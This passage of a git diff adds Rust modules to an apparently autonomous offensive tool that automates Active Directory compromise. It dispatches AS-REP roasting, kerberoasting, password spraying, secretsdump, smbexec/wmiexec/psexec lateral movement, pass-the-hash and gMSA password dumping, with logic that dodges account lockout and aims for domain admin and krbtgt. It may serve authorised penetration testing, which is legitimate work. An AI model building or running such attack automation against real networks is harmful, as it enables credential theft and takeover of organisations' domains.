+ if let Some((dedup_key, hash)) = work.into_iter().next() { + match dispatcher.request_crack(&hash).await { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, hash_type = %hash.hash_type, "Crack task dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) + .await; + } + Ok(None) => {} // deferred or throttled + Err(e) => warn!(err = %e, "Failed to dispatch crack task"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs new file mode 100644 index 00000000..fcfed9aa --- /dev/null +++ b/ares-cli/src/orchestrator/automation/credential_access.rs @@ -0,0 +1,479 @@ +//! auto_credential_access -- kerberoast, AS-REP roast, password spray. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Complex credential access automation: kerberoast, AS-REP roast, password spray. +/// Interval: 15s + Notify wake. Matches Python `_auto_credential_access`. +pub async fn auto_credential_access( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let notify = dispatcher.credential_access_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(15)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + // --- AS-REP Roast: one per domain (unauthenticated — no credentials required) --- + let asrep_work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + state + .domains + .iter() + .filter(|d| !state.is_processed(DEDUP_ASREP_DOMAINS, d)) + .filter_map(|domain| { + // Try DC map first, then fall back to target_ips[0] + let dc_ip = state + .domain_controllers + .get(domain) + .cloned() + .or_else(|| state.target_ips.first().cloned())?; + Some((domain.clone(), dc_ip)) + }) + .collect() + }; + + for (domain, dc_ip) in asrep_work { + let payload = json!({ + "techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"], + "target_ip": dc_ip, + "domain": domain, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 5) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "AS-REP roast dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ASREP_DOMAINS, domain.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ASREP_DOMAINS, &domain) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch AS-REP roast"), + } + } + + // --- Kerberoast: one per domain + credential pair --- + let kerberoast_work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty()) + // Skip delegation accounts — Kerberoast is already done with + // other creds, and burning auth on delegation accounts risks + // lockout before S4U can use them. + .filter(|c| !state.is_delegation_account(&c.username)) + // Skip quarantined credentials — locked out, retry after expiry. 
+ .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + let cred_domain = cred.domain.to_lowercase(); + let dedup = format!("krb:{}:{}", cred_domain, cred.username.to_lowercase()); + if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { + return None; + } + // Exact domain match first + if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { + return Some((dedup, dc_ip, cred_domain, cred.clone())); + } + // Fallback: check child domains (e.g. cred has "contoso.local" + // but user is actually in "child.contoso.local") + let suffix = format!(".{cred_domain}"); + for (domain, dc_ip) in &state.domain_controllers { + if domain.ends_with(&suffix) { + debug!( + cred_domain = %cred_domain, + child_domain = %domain, + "Kerberoast: using child domain DC for parent-domain credential" + ); + return Some((dedup, dc_ip.clone(), domain.clone(), cred.clone())); + } + } + // Last resort: use target_ips[0] if DC map has no entry for this domain + if let Some(fallback_ip) = state.target_ips.first().cloned() { + debug!( + cred_domain = %cred_domain, + fallback_ip = %fallback_ip, + "Kerberoast: using target IP fallback (no DC in map)" + ); + return Some((dedup, fallback_ip, cred_domain, cred.clone())); + } + None + }) + .take(2) + .collect() + }; + + for (dedup_key, dc_ip, resolved_domain, cred) in kerberoast_work { + match dispatcher + .request_credential_access("kerberoast", &dc_ip, &resolved_domain, &cred, 5) + .await + { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, domain = %resolved_domain, "Kerberoast dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CRACK_REQUESTS, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CRACK_REQUESTS, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch kerberoast"), + } + } + + // --- Password spray: username-as-password --- + let spray_work: Vec<(String, String, String)> = { + let state = dispatcher.state.read().await; + state + .users + .iter() + .filter(|u| !u.domain.is_empty()) + // Skip delegation accounts — their auth budget is reserved for + // S4U exploitation. Spraying them causes lockout before S4U fires. 
+ .filter(|u| !state.is_delegation_account(&u.username)) + .filter(|u| !state.is_credential_quarantined(&u.username, &u.domain)) + .filter_map(|u| { + let user_domain = u.domain.to_lowercase(); + let dedup = format!("{}:{}", user_domain, u.username.to_lowercase()); + if state.is_processed(DEDUP_USERNAME_SPRAY, &dedup) { + return None; + } + // Exact match or child-domain fallback + let dc_ip = state + .domain_controllers + .get(&user_domain) + .cloned() + .or_else(|| { + let suffix = format!(".{user_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + })?; + Some((dedup, dc_ip, u.domain.clone())) + }) + .take(5) + .collect() + }; + + // Submit one spray task per domain (batched) + let mut sprayed_domains = std::collections::HashSet::new(); + for (_dedup_key, dc_ip, domain) in &spray_work { + if sprayed_domains.contains(domain) { + continue; + } + sprayed_domains.insert(domain.clone()); + + let payload = json!({ + "technique": "username_as_password", + "target_ip": dc_ip, + "domain": domain, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 4) + .await + { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, domain = %domain, "Password spray dispatched"); + // Mark all users in this domain's batch as processed + for (dk, _, d) in &spray_work { + if d == domain { + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_USERNAME_SPRAY, dk.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_USERNAME_SPRAY, dk) + .await; + } + } + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch password spray"), + } + } + + // --- Low-hanging fruit: SYSVOL, GPP, LDAP descriptions, LAPS per new credential --- + // Mirrors Python's fast credential discovery — dispatches high-success-rate + // techniques that find hardcoded/stored passwords in Active Directory. + let low_hanging_work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — their auth is reserved for S4U. 
+ .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + let cred_domain = cred.domain.to_lowercase(); + let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); + if state.is_processed(DEDUP_LOW_HANGING, &dedup) { + return None; + } + // Find DC for this credential's domain + let dc_ip = state + .domain_controllers + .get(&cred_domain) + .cloned() + .or_else(|| { + let suffix = format!(".{cred_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + }) + .or_else(|| state.target_ips.first().cloned())?; + Some((dedup, dc_ip, cred.clone())) + }) + .take(2) // Max 2 per cycle + .collect() + }; + + for (dedup_key, dc_ip, cred) in low_hanging_work { + match dispatcher + .request_low_hanging_fruit(&dc_ip, &cred.domain, &cred, 4) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %cred.domain, + username = %cred.username, + "Low-hanging fruit credential discovery dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_LOW_HANGING, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_LOW_HANGING, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch low-hanging fruit"), + } + } + + // --- Secretsdump per new credential against same-domain hosts --- + // Dispatches secretsdump for new credentials against hosts in the same + // domain (or child/parent domains). Cross-domain attempts generate + // failed auths that trigger AD account lockout. + // Credentials may be local admin on member servers — secretsdump fails + // fast if not, but when it succeeds it's the fastest path to DA. + let sd_work: Vec<(String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + + // Skip if already DA + if state.has_domain_admin { + Vec::new() + } else { + let mut items = Vec::new(); + for cred in state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — secretsdump will always fail + // (they're not admin) and burns auth budget needed for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + { + let cred_domain = cred.domain.to_lowercase(); + for host in &state.hosts { + // Resolve host domain: prefer hostname FQDN, fall back + // to domain_controllers map for bare-IP hosts. + let host_domain = { + let from_hostname = host + .hostname + .to_lowercase() + .split_once('.') + .map(|x| x.1) + .unwrap_or("") + .to_string(); + if from_hostname.is_empty() { + // Check if this IP is a known DC + state + .domain_controllers + .iter() + .find(|(_, ip)| ip.as_str() == host.ip) + .map(|(d, _)| d.to_lowercase()) + .unwrap_or_default() + } else { + from_hostname + } + }; + // Only target same-domain hosts. Skip unknown-domain + // hosts — they'll be retried next cycle after nmap + // populates hostnames. 
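+                        // e.g. a "contoso.local" cred matches hosts resolved to
+                        // "contoso.local" or "child.contoso.local", and a
+                        // "child.contoso.local" cred also matches a parent
+                        // "contoso.local" host; "fabrikam.local" never matches.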
+ if host_domain.is_empty() + || (host_domain != cred_domain + && !host_domain.ends_with(&format!(".{cred_domain}")) + && !cred_domain.ends_with(&format!(".{host_domain}"))) + { + continue; + } + + let dedup = format!( + "{}:{}:{}", + host.ip, + cred_domain, + cred.username.to_lowercase() + ); + if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { + items.push((dedup, host.ip.clone(), cred.clone())); + } + } + } + items.into_iter().take(5).collect() // Max 5 per cycle + } + }; + + for (dedup_key, target_ip, cred) in sd_work { + let priority = if cred.is_admin { 2 } else { 7 }; + match dispatcher + .request_secretsdump(&target_ip, &cred, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + target = %target_ip, + username = %cred.username, + "Credential secretsdump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch credential secretsdump"), + } + } + + // --- Common password spray: per domain when no admin creds found yet --- + // Keep spraying common passwords until we find admin or achieve DA. + let common_spray_work: Vec<(String, String)> = { + let state = dispatcher.state.read().await; + if state.has_domain_admin || state.credentials.iter().any(|c| c.is_admin) { + // Already have admin creds or DA — skip common spray + Vec::new() + } else { + state + .domain_controllers + .iter() + .filter(|(domain, _)| { + let key = format!("common:{}", domain.to_lowercase()); + !state.is_processed(DEDUP_PASSWORD_SPRAY, &key) + }) + // Only spray after initial recon (AS-REP) has completed. + // This prevents spraying in the first cycle when Kerberoast + // hasn't had time to collect hashes yet. + .filter(|(domain, _)| { + state.is_processed(DEDUP_ASREP_DOMAINS, domain) + || state.is_processed(DEDUP_ASREP_DOMAINS, &domain.to_lowercase()) + }) + // Only spray after delegation enumeration has dispatched for + // at least one credential in this domain. Spraying before + // delegation can lock out accounts and prevent find_delegation + // from using valid credentials. + .filter(|(domain, _)| { + let prefix = format!("{}:", domain.to_lowercase()); + state.has_processed_prefix(DEDUP_DELEGATION_CREDS, &prefix) + }) + // Skip domains with UNCRACKED Kerberoast hashes — + // offline cracking is safer (no lockout risk) and handles + // complex passwords that spray would never find. + // Once all hashes are cracked (or none exist), spray proceeds + // as a fallback path for accounts without SPNs. + .filter(|(domain, _)| { + let d = domain.to_lowercase(); + !state.hashes.iter().any(|h| { + h.hash_type.to_lowercase().contains("kerberoast") + && h.domain.to_lowercase() == d + && h.cracked_password.is_none() + }) + }) + .map(|(domain, dc_ip)| (domain.clone(), dc_ip.clone())) + .collect() + } + }; + + for (domain, dc_ip) in common_spray_work { + let payload = json!({ + "techniques": ["password_spray", "username_as_password"], + "reason": "low_hanging_fruit", + "target_ip": dc_ip, + "domain": domain, + "use_common_passwords": true, + }); + + // Mark as processed BEFORE submitting to prevent duplicate deferred entries. + // The task will be dispatched or deferred regardless. 
+ let key = format!("common:{}", domain.to_lowercase()); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_PASSWORD_SPRAY, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_SPRAY, &key) + .await; + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 3) + .await + { + Ok(Some(task_id)) => { + info!(task_id = %task_id, domain = %domain, "Common password spray dispatched"); + } + Ok(None) => { + debug!(domain = %domain, "Common password spray deferred"); + } + Err(e) => warn!(err = %e, "Failed to dispatch common password spray"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs new file mode 100644 index 00000000..e1b70c68 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs @@ -0,0 +1,410 @@ +//! auto_credential_expansion -- test new credentials across discovered hosts. +//! +//! When new credentials arrive, this automation tries lateral movement +//! (smbexec, wmiexec, psexec) against non-owned hosts. It also tries +//! secretsdump on DCs for ALL credentials (not just admin — the credential +//! access agent determines feasibility). + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::debug; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Lateral movement techniques to try, in order of stealth preference. +const LATERAL_TECHNIQUES: &[&str] = &["smbexec", "wmiexec", "psexec"]; + +/// Monitors for new credentials and dispatches lateral movement + secretsdump. +/// Interval: 15s. Enhanced version of the original auto_credential_expansion. +pub async fn auto_credential_expansion( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(15)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + // Skip if already domain admin + if state.has_domain_admin { + continue; + } + + state + .credentials + .iter() + .filter(|c| !c.domain.is_empty() && !c.password.is_empty()) + // Skip delegation accounts — their auth is reserved for S4U. + .filter(|c| c.is_admin || !state.is_delegation_account(&c.username)) + // Skip quarantined credentials — locked out, retry after expiry. + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + let dedup = format!( + "{}:{}", + cred.domain.to_lowercase(), + cred.username.to_lowercase() + ); + if state.is_processed(DEDUP_EXPANSION_CREDS, &dedup) { + return None; + } + + // Collect non-owned host IPs in the same domain (or child + // domains). Cross-domain lateral attempts with wrong-domain + // creds generate failed auth that triggers AD lockout. + // Domain is extracted from hostname (e.g., + // dc02.child.contoso.local → child.contoso.local). + // Resolve NetBIOS domain names (e.g. "CHILD") to FQDN + // via the netbios_to_fqdn map before matching. 
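+                // e.g. a cred stored with domain "CHILD" becomes
+                // "child.contoso.local" when that mapping exists; with no
+                // mapping, the raw lowercased value is kept as-is.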
+ let cred_dom = { + let raw = cred.domain.to_lowercase(); + if !raw.contains('.') { + state + .netbios_to_fqdn + .get(&raw) + .or_else(|| state.netbios_to_fqdn.get(&cred.domain.to_uppercase())) + .map(|fqdn| fqdn.to_lowercase()) + .unwrap_or(raw) + } else { + raw + } + }; + let targets: Vec = state + .hosts + .iter() + .filter(|h| !h.owned) + .filter(|h| { + // Resolve host domain: prefer hostname FQDN, fall + // back to domain_controllers map for bare-IP hosts. + let host_domain = { + let from_hostname = h + .hostname + .to_lowercase() + .split_once('.') + .map(|x| x.1) + .unwrap_or("") + .to_string(); + if from_hostname.is_empty() { + state + .domain_controllers + .iter() + .find(|(_, ip)| ip.as_str() == h.ip) + .map(|(d, _)| d.to_lowercase()) + .unwrap_or_default() + } else { + from_hostname + } + }; + // Skip unknown-domain hosts — retry next cycle + // after nmap populates hostnames. + !host_domain.is_empty() + && (host_domain == cred_dom + || host_domain.ends_with(&format!(".{cred_dom}")) + || cred_dom.ends_with(&format!(".{host_domain}"))) + }) + .map(|h| h.ip.clone()) + .collect(); + + if targets.is_empty() { + return None; + } + + // Find DCs for this credential's domain (for secretsdump). + // Also include child-domain DCs — parent creds are valid in child domains. + // Reuse resolved cred_dom (already NetBIOS→FQDN resolved). + let cred_domain = cred_dom.clone(); + let dc_ips: Vec = state + .domain_controllers + .iter() + .filter(|(domain, _)| { + let d = domain.to_lowercase(); + d == cred_domain || d.ends_with(&format!(".{cred_domain}")) + }) + .map(|(_, ip)| ip.clone()) + .collect(); + + Some(ExpansionWork { + dedup_key: dedup, + credential: cred.clone(), + targets, + dc_ips, + is_admin: cred.is_admin, + }) + }) + .take(3) // Process max 3 new creds per cycle + .collect() + }; + + for item in work { + let mut any_dispatched = false; + + // 1. Try secretsdump on DCs FIRST — this is the highest-value op + // for a new credential. Must run before lateral movement to avoid + // burning CredentialInflight slots on lower-value tasks. + // Admin creds get priority 2; non-admin get priority 3 (higher + // than lateral at 5) since secretsdump is the fastest path to + // krbtgt → DA → golden ticket. + for dc_ip in &item.dc_ips { + let sd_dedup = format!( + "{}:{}:{}", + dc_ip, + item.credential.domain.to_lowercase(), + item.credential.username.to_lowercase() + ); + let already_dumped = { + let state = dispatcher.state.read().await; + state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) + }; + + if !already_dumped { + let priority = if item.is_admin { 2 } else { 3 }; + if let Ok(Some(task_id)) = dispatcher + .request_secretsdump(dc_ip, &item.credential, priority) + .await + { + any_dispatched = true; + debug!( + task_id = %task_id, + dc = %dc_ip, + is_admin = item.is_admin, + "Credential secretsdump dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) + .await; + } + } + } + + // 2. Try lateral movement on non-DC hosts (up to 5 targets). + // Runs after secretsdump so the high-value op gets credential + // inflight slots first. 
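+            // Note: only the first (stealthiest) technique is dispatched per
+            // target in this pass; the remaining LATERAL_TECHNIQUES entries
+            // record the intended fallback order rather than being tried here.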
+ let technique = LATERAL_TECHNIQUES[0]; // Start with smbexec + for target_ip in item.targets.iter().take(5) { + if let Ok(Some(task_id)) = dispatcher + .request_lateral(target_ip, &item.credential, technique) + .await + { + any_dispatched = true; + debug!( + task_id = %task_id, + target = %target_ip, + technique = technique, + username = %item.credential.username, + "Credential expansion lateral dispatched" + ); + } + } + + // Only mark as processed if at least one task was actually dispatched. + // If all tasks were throttled/deferred, retry next cycle. + if any_dispatched { + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_EXPANSION_CREDS, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_EXPANSION_CREDS, &item.dedup_key) + .await; + } + } + + // 3. Try hashes for pass-the-hash lateral movement + let hash_work: Vec = { + let state = dispatcher.state.read().await; + + if state.has_domain_admin { + continue; + } + + state + .hashes + .iter() + .filter(|h| { + h.hash_type.to_lowercase() == "ntlm" + && !h.domain.is_empty() + && h.username.to_lowercase() != "krbtgt" + && !h.username.ends_with('$') + }) + .filter_map(|hash| { + let dedup = format!( + "{}:{}:{}", + hash.domain.to_lowercase(), + hash.username.to_lowercase(), + &hash.hash_value[..32.min(hash.hash_value.len())] + ); + if state.is_processed(DEDUP_HASH_LATERAL, &dedup) { + return None; + } + + let targets: Vec = state + .hosts + .iter() + .filter(|h| !h.owned) + .map(|h| h.ip.clone()) + .collect(); + + if targets.is_empty() { + return None; + } + + Some(HashExpansionWork { + dedup_key: dedup, + hash: hash.clone(), + targets, + }) + }) + .take(2) + .collect() + }; + + for item in hash_work { + let mut dc_sd_dispatched = false; + + // Build a credential-like object for pass-the-hash + let pth_cred = ares_core::models::Credential { + id: format!("pth_{}", item.hash.username), + username: item.hash.username.clone(), + password: item.hash.hash_value.clone(), + domain: item.hash.domain.clone(), + source: "hash_pth".to_string(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }; + + for target_ip in item.targets.iter().take(3) { + if let Ok(Some(task_id)) = dispatcher + .request_lateral(target_ip, &pth_cred, "pth_smbclient") + .await + { + debug!( + task_id = %task_id, + target = %target_ip, + username = %item.hash.username, + "Hash-based lateral dispatched" + ); + } + } + + // 4. Hash→secretsdump: try pass-the-hash secretsdump against DCs. + // This is the fastest path from hash → krbtgt → DA. + { + let state = dispatcher.state.read().await; + let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); + drop(state); + + for dc_ip in dc_ips { + let sd_dedup = format!( + "{}:{}:{}", + dc_ip, + item.hash.domain.to_lowercase(), + item.hash.username.to_lowercase() + ); + let already = { + let state = dispatcher.state.read().await; + state.is_processed(DEDUP_SECRETSDUMP, &sd_dedup) + }; + if !already { + if let Ok(Some(task_id)) = + dispatcher.request_secretsdump(&dc_ip, &pth_cred, 2).await + { + dc_sd_dispatched = true; + debug!( + task_id = %task_id, + dc = %dc_ip, + username = %item.hash.username, + "Hash-based secretsdump dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SECRETSDUMP, sd_dedup.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SECRETSDUMP, &sd_dedup) + .await; + } + } + } + } + + // Only mark as fully processed once DC secretsdump has been dispatched. 
+ // PTH lateral alone is not sufficient — the critical path is hash→DC→krbtgt. + if dc_sd_dispatched { + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_HASH_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_HASH_LATERAL, &item.dedup_key) + .await; + } + } + } +} + +struct ExpansionWork { + dedup_key: String, + credential: ares_core::models::Credential, + targets: Vec, + dc_ips: Vec, + is_admin: bool, +} + +struct HashExpansionWork { + dedup_key: String, + hash: ares_core::models::Hash, + targets: Vec, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_lateral_techniques_order() { + // smbexec first (stealthiest), then wmiexec, then psexec + assert_eq!(LATERAL_TECHNIQUES[0], "smbexec"); + assert_eq!(LATERAL_TECHNIQUES[1], "wmiexec"); + assert_eq!(LATERAL_TECHNIQUES[2], "psexec"); + } + + #[test] + fn test_lateral_techniques_count() { + assert_eq!(LATERAL_TECHNIQUES.len(), 3); + } + + #[test] + fn test_lateral_techniques_contains() { + assert!(LATERAL_TECHNIQUES.contains(&"smbexec")); + assert!(LATERAL_TECHNIQUES.contains(&"wmiexec")); + assert!(LATERAL_TECHNIQUES.contains(&"psexec")); + assert!(!LATERAL_TECHNIQUES.contains(&"evil-winrm")); + } +} diff --git a/ares-cli/src/orchestrator/automation/delegation.rs b/ares-cli/src/orchestrator/automation/delegation.rs new file mode 100644 index 00000000..6d2672de --- /dev/null +++ b/ares-cli/src/orchestrator/automation/delegation.rs @@ -0,0 +1,103 @@ +//! auto_delegation_enumeration -- find delegation for new creds. + +use std::sync::Arc; +use std::time::Duration; + +use tokio::sync::watch; +use tracing::{debug, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches delegation enumeration for new credentials. +/// Interval: 30s. Matches Python `_auto_delegation_enumeration`. +pub async fn auto_delegation_enumeration( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let notify = dispatcher.delegation_notify.clone(); + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = notify.notified() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec<(String, String, String, ares_core::models::Credential)> = { + let state = dispatcher.state.read().await; + state + .credentials + .iter() + // Skip delegation accounts — delegation enum is already done + // with other creds, and using a delegation account's cred + // burns auth budget reserved for S4U. + .filter(|c| !state.is_delegation_account(&c.username)) + .filter(|c| !state.is_credential_quarantined(&c.username, &c.domain)) + .filter_map(|cred| { + if cred.domain.is_empty() { + return None; + } + let cred_domain = cred.domain.to_lowercase(); + let dedup = format!("{}:{}", cred_domain, cred.username.to_lowercase()); + if state.is_processed(DEDUP_DELEGATION_CREDS, &dedup) { + return None; + } + // Exact match first + let dc_ip = state + .domain_controllers + .get(&cred_domain) + .cloned() + .or_else(|| { + // Child-domain fallback: cred domain is parent, + // DC is registered under child (e.g. 
cred=contoso.local, + // DC=child.contoso.local) + let suffix = format!(".{cred_domain}"); + state + .domain_controllers + .iter() + .find(|(d, _)| d.ends_with(&suffix)) + .map(|(_, ip)| ip.clone()) + }) + .or_else(|| { + // Parent-domain fallback: cred domain is child, + // DC is registered under parent + state + .domain_controllers + .iter() + .find(|(d, _)| cred_domain.ends_with(&format!(".{d}"))) + .map(|(_, ip)| ip.clone()) + })?; + Some((dedup, cred.domain.clone(), dc_ip, cred.clone())) + }) + .collect() + }; + + for (dedup_key, domain, dc_ip, cred) in work { + match dispatcher + .request_delegation_enum(&domain, &dc_ip, &cred) + .await + { + Ok(Some(task_id)) => { + debug!(task_id = %task_id, domain = %domain, "Delegation enumeration dispatched"); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_DELEGATION_CREDS, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_DELEGATION_CREDS, &dedup_key) + .await; + } + Ok(None) => {} + Err(e) => warn!(err = %e, "Failed to dispatch delegation enumeration"), + } + } + } +} diff --git a/ares-cli/src/orchestrator/automation/gmsa.rs b/ares-cli/src/orchestrator/automation/gmsa.rs new file mode 100644 index 00000000..615ab6bc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/gmsa.rs @@ -0,0 +1,145 @@ +//! auto_gmsa_extraction -- dump gMSA passwords when gMSA accounts are found. +//! +//! Group Managed Service Accounts (gMSA) store their passwords in Active +//! Directory in the `msDS-ManagedPassword` attribute. Any principal with read +//! access can retrieve the plaintext password. When we discover users whose +//! names end with `$` and whose descriptions mention "managed service account" +//! (or via BloodHound gMSA edges), we dispatch `gmsa_dump_passwords`. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Monitors for gMSA accounts and dispatches password extraction. +/// Interval: 30s. +pub async fn auto_gmsa_extraction( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! 
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + + // Need at least one credential to query AD for gMSA passwords + if state.credentials.is_empty() { + continue; + } + + // Find gMSA-like accounts from discovered users + let gmsa_accounts: Vec = state + .users + .iter() + .filter_map(|user| { + // gMSA accounts typically end with $ and have "managed service" + // in description, or their name contains "gmsa" / "msds" + let is_gmsa = user.username.ends_with('$') + && (user.description.to_lowercase().contains("managed service") + || user.username.to_lowercase().contains("gmsa")); + + if !is_gmsa { + return None; + } + + let dedup_key = format!( + "{}:{}", + user.domain.to_lowercase(), + user.username.to_lowercase() + ); + if state.is_processed(DEDUP_GMSA_ACCOUNTS, &dedup_key) { + return None; + } + + // Find a credential we can use to query this domain + let cred = state + .credentials + .iter() + .find(|c| c.domain.to_lowercase() == user.domain.to_lowercase())?; + + let dc_ip = state + .domain_controllers + .get(&user.domain.to_lowercase()) + .cloned()?; + + Some(GmsaWork { + dedup_key, + gmsa_account: user.username.clone(), + domain: user.domain.clone(), + dc_ip, + credential: cred.clone(), + }) + }) + .collect(); + + gmsa_accounts + }; + + for item in work { + let payload = json!({ + "technique": "gmsa_dump_passwords", + "target_ip": item.dc_ip, + "domain": item.domain, + "gmsa_account": item.gmsa_account, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, 3) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + gmsa_account = %item.gmsa_account, + domain = %item.domain, + "gMSA password dump dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GMSA_ACCOUNTS, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GMSA_ACCOUNTS, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(gmsa = %item.gmsa_account, "gMSA task deferred by throttler"); + } + Err(e) => { + warn!(err = %e, gmsa = %item.gmsa_account, "Failed to dispatch gMSA dump") + } + } + } + } +} + +struct GmsaWork { + dedup_key: String, + gmsa_account: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} diff --git 